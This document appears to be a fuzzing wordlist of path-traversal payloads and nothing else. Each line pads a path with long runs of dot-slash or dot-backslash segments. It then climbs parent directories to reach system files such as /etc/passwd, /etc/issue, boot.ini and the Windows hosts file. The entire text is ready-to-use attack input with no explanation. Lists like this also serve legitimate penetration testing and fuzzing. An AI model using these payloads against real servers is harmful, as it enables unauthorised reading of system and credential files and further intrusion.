-././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\etc\passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\etc\passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\..\etc\passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\..\..\..\windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../etc\issue 